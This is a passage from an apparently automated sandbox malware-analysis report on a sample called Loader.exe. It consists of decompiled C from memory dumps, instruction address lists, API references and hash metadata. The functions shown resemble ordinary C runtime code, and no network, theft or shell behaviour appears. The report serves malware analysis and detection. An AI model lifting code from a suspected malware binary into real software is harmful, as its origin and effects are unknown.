											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0xb384e0 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0xb384e4 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E00AEF21B(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E00AEF21B(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E00AED23F();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x00af159f
0x00af15a8
0x00af15ad
0x00af15b7
0x00af15ba
0x00af15d7
0x00af15d8
0x00af15eb
0x00af15f0
0x00af15f8
0x00af15fe
0x00af1601
0x00af1603
0x00af160a
0x00af160a
0x00af160c
0x00af160f
0x00af1612
0x00af1619
0x00af1632
0x00af1637
0x00af1639
0x00af165a
0x00af1662
0x00af1665
0x00af1680
0x00af1683
0x00af168a
0x00af168e
0x00af1690
0x00af1697
0x00af169a
0x00af169c
0x00af169e
0x00af16a0
0x00af16aa
0x00af16aa
0x00af16ac
0x00af16b2
0x00af16b5
0x00af16b7
0x00af16bd
0x00af16be
0x00af16c4
0x00af16c7
0x00af16c8
0x00af16ce
0x00af16d1
0x00000000
0x00000000
0x00000000
0x00000000
0x00af16a2
0x00af16a2
0x00af16a2
0x00af16a5
0x00af16a6
0x00af16a6
0x00000000
0x00af16a2
0x00af1692
0x00000000
0x00af1692
0x00af166a
0x00af166a
0x00af166b
0x00af1670
0x00af1672
0x00af1674
0x00af1679
0x00af1679
0x00000000
0x00af1679
0x00af163b
0x00af1640
0x00af1642
0x00af1643
0x00000000
0x00af1643
0x00af1605
0x00af1608
0x00000000
0x00000000
0x00000000
0x00af1608
0x00af15bc
0x00af15bf
0x00000000
0x00000000
0x00af15c1
0x00af15c8
0x00af15c9
0x00af15cb
0x00af15d0
0x00000000
0x00af15d0
0x00000000

Strings

#|, xrefs: 00AF15F0
C:\Users\user\Desktop\Loader.exe, xrefs: 00AF15E2, 00AF15E9, 00AF161F

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\Loader.exe$#|
API String ID: 0-1089513903
Opcode ID: 1b327d4d0bd7a8c65946030c04ab3ddf0390282d5e3c7463e571312168973699
Instruction ID: 0f0abc6775f80f17e714a3268f15414eb80e947104337e203ca91de5e1d1a9d3
Opcode Fuzzy Hash: 1b327d4d0bd7a8c65946030c04ab3ddf0390282d5e3c7463e571312168973699
Instruction Fuzzy Hash: F2417071A0021DEFCB61EBDA9D819BEBBF9EF85350B14006AF601D7251EB719A40CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00AF591D Relevance: 6.3, APIs: 4, Instructions: 320
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00AF591D(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v32;
				signed int _v40;
				char _v48;
				intOrPtr _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				signed char _t85;
				void* _t91;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t104;
				signed int _t105;
				void* _t106;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				signed int _t117;
				signed int* _t118;
				void* _t121;
				signed int _t123;
				signed int _t129;
				signed int* _t130;
				signed int* _t133;
				signed int _t134;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t150;
				void* _t154;
				unsigned int _t155;
				signed int _t162;
				void* _t163;
				signed int _t164;
				signed int* _t165;
				signed int _t168;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				void* _t181;

				_t163 = __edx;
				_t173 = _a24;
				if(_t173 < 0) {
					_t173 = 0;
				}
				_t177 = _a8;
				 *_t177 = 0;
				E00AED88E( &_v60, _t163, _a36);
				_t5 = _t173 + 0xb; // 0xb
				_t185 = _a12 - _t5;
				if(_a12 > _t5) {
					_t133 = _a4;
					_t139 = _t133[1];
					_t164 =  *_t133;
					__eflags = (_t139 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t139 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						__eflags = _t139;
						if(__eflags > 0) {
							L14:
							_t165 = _t177 + 1;
							_t85 = _a28 ^ 0x00000001;
							_v16 = 0x3ff;
							_v5 = _t85;
							_v40 = _t165;
							_v32 = ((_t85 & 0x000000ff) << 5) + 7;
							__eflags = _t139 & 0x7ff00000;
							_t91 = 0x30;
							if((_t139 & 0x7ff00000) != 0) {
								 *_t177 = 0x31;
								L19:
								_t141 = 0;
								__eflags = 0;
								L20:
								_t178 =  &(_t165[0]);
								_v12 = _t178;
								__eflags = _t173;
								if(_t173 != 0) {
									_t95 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
								} else {
									_t95 = _t141;
								}
								 *_t165 = _t95;
								_t97 = _t133[1] & 0x000fffff;
								__eflags = _t97;
								_v24 = _t97;
								if(_t97 > 0) {
									L25:
									_t166 = _t141;
									_t142 = 0xf0000;
									_t98 = 0x30;
									_v12 = _t98;
									_v20 = _t141;
									_v24 = 0xf0000;
									do {
										__eflags = _t173;
										if(_t173 <= 0) {
											break;
										}
										_t121 = E00B03B10( *_t133 & _t166, _v12, _t133[1] & _t142 & 0x000fffff);
										_t154 = 0x30;
										_t123 = _t121 + _t154 & 0x0000ffff;
										__eflags = _t123 - 0x39;
										if(_t123 > 0x39) {
											_t123 = _t123 + _v32;
											__eflags = _t123;
										}
										_t155 = _v24;
										_t166 = (_t155 << 0x00000020 | _v20) >> 4;
										 *_t178 = _t123;
										_t178 = _t178 + 1;
										_t142 = _t155 >> 4;
										_t98 = _v12 - 4;
										_t173 = _t173 - 1;
										_v20 = (_t155 << 0x00000020 | _v20) >> 4;
										_v24 = _t155 >> 4;
										_v12 = _t98;
										__eflags = _t98;
									} while (_t98 >= 0);
									_v12 = _t178;
									__eflags = _t98;
									if(__eflags < 0) {
										goto L42;
									}
									_t117 = E00AF6138(__eflags, _t133, _t166, _t142, _t98, _a40);
									_t181 = _t181 + 0x14;
									__eflags = _t117;
									if(_t117 == 0) {
										goto L42;
									}
									_t118 = _t178 - 1;
									_t137 = 0x30;
									while(1) {
										_t149 =  *_t118;
										__eflags = _t149 - 0x66;
										if(_t149 == 0x66) {
											goto L35;
										}
										__eflags = _t149 - 0x46;
										if(_t149 != 0x46) {
											_t133 = _a4;
											__eflags = _t118 - _v40;
											if(_t118 == _v40) {
												_t54 = _t118 - 1;
												 *_t54 =  *(_t118 - 1) + 1;
												__eflags =  *_t54;
											} else {
												__eflags = _t149 - 0x39;
												if(_t149 != 0x39) {
													_t150 = _t149 + 1;
													__eflags = _t150;
												} else {
													_t150 = _v32 + 0x3a;
												}
												 *_t118 = _t150;
											}
											goto L42;
										}
										L35:
										 *_t118 = _t137;
										_t118 = _t118 - 1;
									}
								} else {
									__eflags =  *_t133 - _t141;
									if( *_t133 <= _t141) {
										L42:
										__eflags = _t173;
										if(_t173 > 0) {
											_push(_t173);
											_t115 = 0x30;
											_push(_t115);
											_push(_t178);
											E00AEA8E0(_t173);
											_t178 = _t178 + _t173;
											__eflags = _t178;
											_v12 = _t178;
										}
										_t99 = _v40;
										__eflags =  *_t99;
										if( *_t99 == 0) {
											_t178 = _t99;
											_v12 = _t178;
										}
										 *_t178 = (_v5 << 5) + 0x50;
										_t104 = E00B03B10( *_t133, 0x34, _t133[1]);
										_t179 = 0;
										_t105 = _v12;
										_t146 = (_t104 & 0x000007ff) - _v16;
										__eflags = _t146;
										asm("sbb esi, esi");
										_t168 = _t105 + 2;
										_v40 = _t168;
										if(__eflags < 0) {
											L50:
											_t146 =  ~_t146;
											asm("adc esi, 0x0");
											_t179 =  ~_t179;
											_t134 = 0x2d;
											goto L51;
										} else {
											if(__eflags > 0) {
												L49:
												_t134 = 0x2b;
												L51:
												 *(_t105 + 1) = _t134;
												_t174 = _t168;
												_t106 = 0x30;
												 *_t168 = _t106;
												_t107 = 0;
												__eflags = _t179;
												if(__eflags < 0) {
													L55:
													__eflags = _t174 - _t168;
													if(_t174 != _t168) {
														L59:
														_push(_t134);
														_push(_t107);
														_push(0x64);
														_push(_t179);
														_t108 = E00B03B30();
														_t179 = _t134;
														_t134 = _t146;
														_v32 = _t168;
														_t168 = _v40;
														 *_t174 = _t108 + 0x30;
														_t174 = _t174 + 1;
														_t107 = 0;
														__eflags = 0;
														L60:
														__eflags = _t174 - _t168;
														if(_t174 != _t168) {
															L64:
															_push(_t134);
															_push(_t107);
															_push(0xa);
															_push(_t179);
															_push(_t146);
															_t110 = E00B03B30();
															_v40 = _t168;
															 *_t174 = _t110 + 0x30;
															_t174 = _t174 + 1;
															_t107 = 0;
															__eflags = 0;
															L65:
															_t147 = _t146 + 0x30;
															__eflags = _t147;
															 *_t174 = _t147;
															 *(_t174 + 1) = _t107;
															_t175 = _t107;
															L66:
															if(_v48 != 0) {
																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
															}
															return _t175;
														}
														__eflags = _t179 - _t107;
														if(__eflags < 0) {
															goto L65;
														}
														if(__eflags > 0) {
															goto L64;
														}
														__eflags = _t146 - 0xa;
														if(_t146 < 0xa) {
															goto L65;
														}
														goto L64;
													}
													__eflags = _t179 - _t107;
													if(__eflags < 0) {
														goto L60;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t146 - 0x64;
													if(_t146 < 0x64) {
														goto L60;
													}
													goto L59;
												}
												_t134 = 0x3e8;
												if(__eflags > 0) {
													L54:
													_push(_t134);
													_push(_t107);
													_push(_t134);
													_push(_t179);
													_t113 = E00B03B30();
													_t179 = _t134;
													_t134 = _t146;
													_v32 = _t168;
													_t168 = _v40;
													 *_t168 = _t113 + 0x30;
													_t174 = _t168 + 1;
													_t107 = 0;
													__eflags = 0;
													goto L55;
												}
												__eflags = _t146 - 0x3e8;
												if(_t146 < 0x3e8) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t146;
											if(_t146 < 0) {
												goto L50;
											}
											goto L49;
										}
									}
									goto L25;
								}
							}
							 *_t177 = _t91;
							_t141 =  *_t133 | _t133[1] & 0x000fffff;
							__eflags = _t141;
							if(_t141 != 0) {
								_v16 = 0x3fe;
								goto L19;
							}
							_v16 = _t141;
							goto L20;
						}
						if(__eflags < 0) {
							L13:
							 *_t177 = 0x2d;
							_t177 = _t177 + 1;
							__eflags = _t177;
							_t139 = _t133[1];
							goto L14;
						}
						__eflags = _t164;
						if(_t164 >= 0) {
							goto L14;
						}
						goto L13;
					}
					_t175 = E00AF5C2C(_t133, _t139, _t164, _t133, _t177, _a12, _a16, _a20, _t173, 0, _a32, 0, _a40);
					__eflags = _t175;
					if(_t175 == 0) {
						_t129 = E00B03D50(_t177, 0x65);
						__eflags = _t129;
						if(_t129 != 0) {
							_t162 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							__eflags = _t162;
							 *_t129 = _t162;
							 *((char*)(_t129 + 3)) = 0;
						}
						_t175 = 0;
					} else {
						 *_t177 = 0;
					}
					goto L66;
				}
				_t130 = E00AEF21B(_t185);
				_t175 = 0x22;
				 *_t130 = _t175;
				E00AED23F();
				goto L66;
			}

0x00af591d
0x00af5928
0x00af592d
0x00af592f
0x00af592f
0x00af5933
0x00af593c
0x00af593e
0x00af5943
0x00af5946
0x00af5949
0x00af595f
0x00af5962
0x00af5967
0x00af5971
0x00af5976
0x00af59cd
0x00af59cf
0x00af59de
0x00af59e1
0x00af59e4
0x00af59e6
0x00af59ed
0x00af59ff
0x00af5a02
0x00af5a07
0x00af5a0b
0x00af5a0c
0x00af5a2c
0x00af5a2f
0x00af5a2f
0x00af5a2f
0x00af5a31
0x00af5a31
0x00af5a34
0x00af5a37
0x00af5a39
0x00af5a4a
0x00af5a3b
0x00af5a3b
0x00af5a3b
0x00af5a4c
0x00af5a51
0x00af5a51
0x00af5a56
0x00af5a59
0x00af5a63
0x00af5a65
0x00af5a67
0x00af5a6c
0x00af5a6d
0x00af5a70
0x00af5a73
0x00af5a76
0x00af5a76
0x00af5a78
0x00000000
0x00000000
0x00af5a8f
0x00af5a96
0x00af5a9a
0x00af5a9d
0x00af5aa0
0x00af5aa2
0x00af5aa2
0x00af5aa2
0x00af5aa8
0x00af5aab
0x00af5aaf
0x00af5ab1
0x00af5ab5
0x00af5ab8
0x00af5abb
0x00af5abc
0x00af5abf
0x00af5ac2
0x00af5ac5
0x00af5ac5
0x00af5aca
0x00af5acd
0x00af5ad0
0x00000000
0x00000000
0x00af5ad9
0x00af5ade
0x00af5ae1
0x00af5ae3
0x00000000
0x00000000
0x00af5ae7
0x00af5aea
0x00af5aeb
0x00af5aeb
0x00af5aed
0x00af5af0
0x00000000
0x00000000
0x00af5af2
0x00af5af5
0x00af5afc
0x00af5aff
0x00af5b02
0x00af5b17
0x00af5b17
0x00af5b17
0x00af5b04
0x00af5b04
0x00af5b07
0x00af5b11
0x00af5b11
0x00af5b09
0x00af5b0c
0x00af5b0c
0x00af5b13
0x00af5b13
0x00000000
0x00af5b02
0x00af5af7
0x00af5af7
0x00af5af9
0x00af5af9
0x00af5a5b
0x00af5a5b
0x00af5a5d
0x00af5b1a
0x00af5b1a
0x00af5b1c
0x00af5b1e
0x00af5b21
0x00af5b22
0x00af5b23
0x00af5b24
0x00af5b2c
0x00af5b2c
0x00af5b2e
0x00af5b2e
0x00af5b31
0x00af5b34
0x00af5b37
0x00af5b39
0x00af5b3b
0x00af5b3b
0x00af5b48
0x00af5b4f
0x00af5b56
0x00af5b58
0x00af5b61
0x00af5b61
0x00af5b64
0x00af5b66
0x00af5b69
0x00af5b6c
0x00af5b78
0x00af5b78
0x00af5b7c
0x00af5b7f
0x00af5b81
0x00000000
0x00af5b6e
0x00af5b6e
0x00af5b74
0x00af5b74
0x00af5b82
0x00af5b82
0x00af5b85
0x00af5b89
0x00af5b8a
0x00af5b8c
0x00af5b8e
0x00af5b90
0x00af5bba
0x00af5bba
0x00af5bbc
0x00af5bc9
0x00af5bc9
0x00af5bca
0x00af5bcb
0x00af5bcd
0x00af5bcf
0x00af5bd4
0x00af5bd6
0x00af5bda
0x00af5bdd
0x00af5be0
0x00af5be2
0x00af5be3
0x00af5be3
0x00af5be5
0x00af5be5
0x00af5be7
0x00af5bf4
0x00af5bf4
0x00af5bf5
0x00af5bf6
0x00af5bf8
0x00af5bf9
0x00af5bfa
0x00af5c03
0x00af5c06
0x00af5c08
0x00af5c09
0x00af5c09
0x00af5c0b
0x00af5c0b
0x00af5c0b
0x00af5c0e
0x00af5c10
0x00af5c13
0x00af5c15
0x00af5c1b
0x00af5c20
0x00af5c20
0x00af5c2b
0x00af5c2b
0x00af5be9
0x00af5beb
0x00000000
0x00000000
0x00af5bed
0x00000000
0x00000000
0x00af5bef
0x00af5bf2
0x00000000
0x00000000
0x00000000
0x00af5bf2
0x00af5bbe
0x00af5bc0
0x00000000
0x00000000
0x00af5bc2
0x00000000
0x00000000
0x00af5bc4
0x00af5bc7
0x00000000
0x00000000
0x00000000
0x00af5bc7
0x00af5b92
0x00af5b97
0x00af5b9d
0x00af5b9d
0x00af5b9e
0x00af5b9f
0x00af5ba0
0x00af5ba2
0x00af5ba7
0x00af5ba9
0x00af5bab
0x00af5bb0
0x00af5bb3
0x00af5bb5
0x00af5bb8
0x00af5bb8
0x00000000
0x00af5bb8
0x00af5b99
0x00af5b9b
0x00000000
0x00000000
0x00000000
0x00af5b9b
0x00af5b70
0x00af5b72
0x00000000
0x00000000
0x00000000
0x00af5b72
0x00af5b6c
0x00000000
0x00af5a5d
0x00af5a59
0x00af5a0e
0x00af5a1a
0x00af5a1a
0x00af5a1c
0x00af5a23
0x00000000
0x00af5a23
0x00af5a1e
0x00000000
0x00af5a1e
0x00af59d1
0x00af59d7
0x00af59d7
0x00af59da
0x00af59da
0x00af59db
0x00000000
0x00af59db
0x00af59d3
0x00af59d5
0x00000000
0x00000000
0x00000000
0x00af59d5
0x00af5993
0x00af5998
0x00af599a
0x00af59a7
0x00af59ae
0x00af59b0
0x00af59bb
0x00af59bb
0x00af59be
0x00af59c0
0x00af59c0
0x00af59c4
0x00af599c
0x00af599c
0x00af599c
0x00000000
0x00af599a
0x00af594b
0x00af5952
0x00af5953
0x00af5955
0x00000000

APIs

_strrchr.LIBCMT ref: 00AF59A7

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: e6313e5e153888df2ac1b759c5c389dc176b851a01274b1ada4513f4e8f9537d
Instruction ID: dab8901d0121c77f3294d3bcdc6f1be55af82b26227ba4f52ce737f42018b04f
Opcode Fuzzy Hash: e6313e5e153888df2ac1b759c5c389dc176b851a01274b1ada4513f4e8f9537d
Instruction Fuzzy Hash: D3B15831D00A899FDB159FB8C891BBEBBF5EF55350F1441AAF7459B242E2349D02CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00AEBE71 Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 67%

			E00AEBE71(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0xb12ad8);
				E00AE9A40(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E00AEA360(_t107, E00AEAB7A(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E00AEA360(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0xb38194; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0xb05148();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E00AF0E59(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0xb12af8);
									E00AE9A40(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E00AEBE71(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E00AECB71(_t103, _t108[0x18], E00AEAB7A( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E00AECB81(_t103, _t108[0x18], E00AEAB7A( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E00AEAB7A();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x00aebe71
0x00aebe73
0x00aebe78
0x00aebe7d
0x00aebe7f
0x00aebe82
0x00aebe87
0x00aebf97
0x00aebf97
0x00aebf97
0x00000000
0x00aebe96
0x00aebe96
0x00aebe9b
0x00aebea5
0x00aebea7
0x00aebeac
0x00aebeb1
0x00aebeb1
0x00aebeb3
0x00aebeb6
0x00aebebb
0x00aebedd
0x00aebedd
0x00aebee0
0x00aebee3
0x00aebf01
0x00aebf04
0x00aebf43
0x00aebf46
0x00aebf49
0x00aebf6e
0x00aebf70
0x00000000
0x00aebf72
0x00aebf72
0x00aebf74
0x00000000
0x00aebf76
0x00aebf76
0x00aebf7b
0x00aebf7f
0x00aebf7f
0x00aebf80
0x00000000
0x00aebf80
0x00aebf74
0x00aebf4b
0x00aebf4b
0x00aebf4d
0x00000000
0x00aebf4f
0x00aebf4f
0x00aebf51
0x00000000
0x00aebf53
0x00aebf64
0x00000000
0x00aebf69
0x00aebf51
0x00aebf4d
0x00aebf06
0x00aebf06
0x00aebf0a
0x00000000
0x00aebf10
0x00aebf10
0x00aebf12
0x00000000
0x00aebf18
0x00aebf1f
0x00aebf27
0x00aebf2b
0x00aebf2d
0x00aebf30
0x00aebf35
0x00aebf36
0x00000000
0x00aebf36
0x00aebf30
0x00000000
0x00aebf2b
0x00aebf12
0x00aebf0a
0x00aebee5
0x00aebee5
0x00000000
0x00aebee5
0x00aebec2
0x00aebec2
0x00aebec7
0x00aebecc
0x00000000
0x00aebece
0x00aebed0
0x00aebed9
0x00aebee8
0x00aebeea
0x00aebfa9
0x00aebfa9
0x00aebfae
0x00aebfaf
0x00aebfb1
0x00aebfb6
0x00aebfbb
0x00aebfbe
0x00aebfc1
0x00aebfc4
0x00aebfcd
0x00aebfcd
0x00aebfc6
0x00aebfc6
0x00aebfc6
0x00aebfd0
0x00aebfd4
0x00aebfd7
0x00aebfd8
0x00aebfd9
0x00aebfda
0x00aebfdd
0x00aebfe6
0x00aebfe6
0x00aebfe9
0x00aec01f
0x00aebfeb
0x00aebfeb
0x00aebfeb
0x00aebfee
0x00aec005
0x00aec005
0x00aebfee
0x00aec024
0x00aec02e
0x00aec03a
0x00aebef8
0x00aebef8
0x00aebefd
0x00aebefe
0x00aebf38
0x00aebf3f
0x00aebf83
0x00aebf83
0x00aebf8a
0x00aebf99
0x00aebf9c
0x00aebfa8
0x00aebfa8
0x00aebeea
0x00aebecc
0x00000000
0x00000000
0x00000000
0x00aebe9b

APIs

___AdjustPointer.LIBCMT ref: 00AEBF38
___AdjustPointer.LIBCMT ref: 00AEBF5B
___AdjustPointer.LIBCMT ref: 00AEBFF7

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 4b0b005bdebe3934c50efa9c4b4d9829cc2e1d3404eba534dd60824e140b541f
Instruction ID: 0f7ea5d303e3fcd61796005fde53348cde4cdb971112e30dd1aa055aac41537c
Opcode Fuzzy Hash: 4b0b005bdebe3934c50efa9c4b4d9829cc2e1d3404eba534dd60824e140b541f
Instruction Fuzzy Hash: 5251E272610286EFDB298F56D949BBB77A4EF44310F24452DFD06971A1D731EC81CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AFBB46 Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AFBB46(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E00AFB701(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E00AFB701(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E00AEF1E5(GetLastError());
									_t19 =  *((intOrPtr*)(E00AEF21B(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E00AFC10C(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E00AEF1E5(GetLastError());
						return  *((intOrPtr*)(E00AEF21B(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E00AFC10C(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E00AF0F88(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
